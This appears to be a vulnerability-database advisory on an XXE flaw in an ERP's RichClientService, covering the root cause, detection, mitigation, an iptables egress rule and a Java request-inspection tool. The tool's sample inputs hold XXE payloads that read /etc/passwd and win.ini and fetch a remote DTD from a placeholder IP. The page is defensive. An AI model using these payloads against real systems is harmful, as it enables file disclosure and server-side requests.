CVE Vulnerability Database

CVE-2026-1218: Bjskzy Zhiyou ERP XXE Vulnerability

CVE-2026-1218 is an XML external entity (XXE) vulnerability in Bjskzy Zhiyou ERP up to version 11.0. An authenticated remote attacker can submit XML containing external entity declarations to the initRCForm function of RichClientService, and the server resolves the referenced URIs. This post covers technical details, affected versions, detection, and mitigation.

CVE-2026-1218 Overview

CVE-2026-1218 is an XML External Entity (XXE) vulnerability affecting Bjskzy Zhiyou ERP versions up to and including 11.0. The flaw resides in the initRCForm function of RichClientService.class within the com.artery.richclient.RichClientService component. An authenticated remote attacker can supply XML input to this function that declares external entities, and the parser resolves those entity references on the server [CWE-610]. A public proof-of-concept exploit exists on GitHub. The vendor was contacted prior to disclosure but did not respond.

Critical Impact

A remote attacker holding a low-privileged ERP account can use XXE processing in the initRCForm handler to read files the ERP service account can access, or to make the ERP server issue out-of-band requests to attacker-controlled hosts. The CVSS 4.0 vector rates each of the confidentiality, integrity, and availability impacts as limited.

Affected Products

  • Bjskzy Zhiyou ERP versions up to and including 11.0
  • Component: com.artery.richclient.RichClientService
  • File: RichClientService.class (function initRCForm)

Discovery Timeline

  • 2026-01-20 - CVE-2026-1218 published to the National Vulnerability Database (NVD)
  • 2026-04-29 - Last updated in NVD database

Technical Details for CVE-2026-1218

Vulnerability Analysis

The vulnerability is classified as CWE-610, Externally Controlled Reference to a Resource in Another Sphere; the specific weakness is XML external entity (XXE) resolution. The initRCForm function in RichClientService.class parses XML input without disabling external entity resolution. An attacker submits a crafted XML payload containing a DOCTYPE declaration that defines external entities whose SYSTEM identifiers point at a local file path or a remote URL. The XML parser dereferences these entities during processing, which enables unauthorized data access or out-of-band interactions with attacker-controlled hosts.

The issue affects confidentiality, integrity, and availability at limited levels according to the CVSS 4.0 vector. Authentication is required, but no user interaction is needed. The attack proceeds over the network against the ERP service endpoint exposing the RichClient interface.

Root Cause

The root cause is improper configuration of the XML parser used by initRCForm. The parser accepts DOCTYPE declarations and external entity definitions, which is the default behaviour of the standard Java XML parsers (JAXP DocumentBuilderFactory, SAXParserFactory, XMLInputFactory) unless secure features are set explicitly. Secure XML processing requires disallowing DOCTYPE declarations outright or, where a DTD is genuinely needed, disabling external general entities, external parameter entities, and external DTD loading. Without these settings, entity URIs chosen by the attacker are resolved by the server.

Attack Vector

An authenticated attacker sends a crafted XML request to the RichClientService endpoint invoking initRCForm. The XML payload includes an external entity definition pointing to a local file path or attacker-controlled URL. When the server parses the XML, it resolves the entity and includes its contents in subsequent processing or outbound requests. Refer to the GitHub PoC for the XXE vulnerability for the proof-of-concept details.

No verified sanitized code example is available. The publicly disclosed PoC documents the XML payload structure used against the initRCForm handler.

Detection Methods for CVE-2026-1218

Indicators of Compromise

  • Inbound HTTP requests to the RichClientService endpoint containing XML payloads with <!DOCTYPE or <!ENTITY declarations.
  • Unexpected outbound DNS lookups or HTTP requests from the ERP server to unknown external hosts.
  • Application logs showing XML parsing errors or unexpected file read operations under the ERP service account.

Detection Strategies

  • Inspect web application firewall (WAF) and proxy logs for XML requests containing external entity references targeting /RichClientService or initRCForm.
  • Monitor the ERP host for anomalous file access patterns to sensitive paths such as /etc/passwd or Windows configuration files initiated by the Java process.
  • Correlate authenticated session activity with outbound network connections originating from the ERP application process.

Monitoring Recommendations

  • Enable verbose logging on the com.artery.richclient.RichClientService component to capture incoming XML payloads.
  • Forward ERP application logs and network flow data to a centralized SIEM for correlation against XXE signatures.
  • Establish baselines for outbound connections from ERP servers and alert on deviations.

How to Mitigate CVE-2026-1218

Immediate Actions Required

  • Restrict network access to the RichClientService endpoint using firewall rules or reverse proxy ACLs until a patch is available.
  • Audit ERP user accounts and revoke unnecessary privileges that could enable authenticated XXE exploitation.
  • Review historical logs for evidence of prior exploitation attempts referencing initRCForm.

Patch Information

The vendor was contacted regarding this disclosure but did not respond. No official patch is currently referenced in the NVD entry or the VulDB advisory #341908. Organizations should monitor vendor channels for updates and apply any forthcoming patches immediately.

Workarounds

  • Deploy a WAF rule blocking XML requests containing <!DOCTYPE or <!ENTITY directives sent to the ERP RichClientService endpoint.
  • If feasible, disable or remove the RichClientService component when not required by business workflows.
  • Place the ERP server behind a network egress filter that denies outbound connections to untrusted destinations, limiting out-of-band XXE impact.
```bash
# Example egress filtering with iptables to limit outbound connections from the ERP host.
# Assumes the ERP Java process runs as the local user "erpuser". Replies on existing
# connections (including the ERP's own responses to clients) must be accepted first,
# otherwise the final REJECT cuts the service off. New connections from the ERP process
# are then allowed only to known dependencies; a hostname in -d is resolved once, at
# insertion time, so prefer an IP address. DNS lookups of attacker-chosen hostnames still
# go through the local resolver, so this limits but does not remove DNS-based OOB signals.
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --syn -m owner --uid-owner erpuser -d trusted.example.com --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --syn -m owner --uid-owner erpuser -j REJECT
```
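The following is an added example, not part of the original advisory or the vendor's software. It implements the request inspection that both the detection strategies above and the WAF workaround depend on: flag a request body carrying a DOCTYPE or ENTITY declaration, pull out the SYSTEM/PUBLIC identifiers so the file path or out-of-band host can be matched against egress and file-access logs, and block when the target is the RichClientService path the advisory assumes. The sample requests, the path strings and the 198.51.100.7 address are constructed; they are not captured traffic.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class XxeRequestInspector {

    // Matches DOCTYPE / ENTITY declarations regardless of case and of whitespace
    // between "<!" and the keyword, which a literal "<!DOCTYPE" string check misses.
    private static final Pattern DECL =
        Pattern.compile("<!\\s*(DOCTYPE|ENTITY)\\b", Pattern.CASE_INSENSITIVE);

    // Extracts the external identifier from SYSTEM "uri" or PUBLIC "id" "uri"
    // so the referenced file path or remote host can be correlated elsewhere.
    private static final Pattern EXT_ID = Pattern.compile(
        "\\b(SYSTEM|PUBLIC)\\s+([\"'])([^\"']*)\\2(?:\\s+([\"'])([^\"']*)\\4)?",
        Pattern.CASE_INSENSITIVE);

    public enum Verdict { ALLOW, BLOCK_XXE, REVIEW_DOCTYPE_OTHER_PATH }

    public static final class Finding {
        public final Verdict verdict;
        public final List<String> externalIds;
        Finding(Verdict verdict, List<String> externalIds) {
            this.verdict = verdict;
            this.externalIds = externalIds;
        }
        @Override public String toString() { return verdict + " " + externalIds; }
    }

    // Decision for one request (URL path plus decoded body). The same call serves
    // as a log-review classifier and as the decision a WAF rule would take before
    // the request reaches the ERP. The body must already be decoded (transfer
    // encoding removed, converted from UTF-16 if declared) or the match is bypassed.
    public static Finding inspect(String path, String body) {
        boolean hasDecl = DECL.matcher(body).find();
        List<String> ids = new ArrayList<>();
        Matcher m = EXT_ID.matcher(body);
        while (m.find()) {
            // For PUBLIC the URI is the second literal; for SYSTEM it is the first.
            ids.add(m.group(5) != null ? m.group(5) : m.group(3));
        }
        if (!hasDecl) {
            return new Finding(Verdict.ALLOW, ids);
        }
        // Assumed path of the vulnerable service, as used in the advisory text.
        boolean richClient = path.contains("RichClientService") || path.contains("initRCForm");
        return new Finding(richClient ? Verdict.BLOCK_XXE : Verdict.REVIEW_DOCTYPE_OTHER_PATH, ids);
    }

    public static void main(String[] args) {
        // Constructed sample requests {path, body}; not captured traffic.
        String[][] samples = {
            {"/RichClientService", "<rcForm><name>order</name></rcForm>"},
            {"/RichClientService", "<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY x SYSTEM "
                + "\"file:///etc/passwd\">]><rcForm><name>&x;</name></rcForm>"},
            {"/RichClientService", "<!doctype r [<!entity % p SYSTEM 'http://198.51.100.7/x.dtd'> %p;]><rcForm/>"},
            {"/other/report", "<!DOCTYPE r [<!ENTITY x SYSTEM \"file:///C:/Windows/win.ini\">]><r>&x;</r>"},
        };
        for (String[] s : samples) {
            System.out.printf("%-20s %s%n", s[0], inspect(s[0], s[1]));
        }
    }
}
```

Running main prints ALLOW for the first request, BLOCK_XXE with file:///etc/passwd and with http://198.51.100.7/x.dtd for the second and third, and REVIEW_DOCTYPE_OTHER_PATH with file:///C:/Windows/win.ini for the fourth. Before enforcing the BLOCK_XXE verdict in a WAF, confirm from a traffic baseline that legitimate RichClient requests never carry a DOCTYPE; the third sample also shows why parameter entities (`%p;`) and lower-case keywords must be matched, since a rule written only for `<!ENTITY x SYSTEM` would miss them.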

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
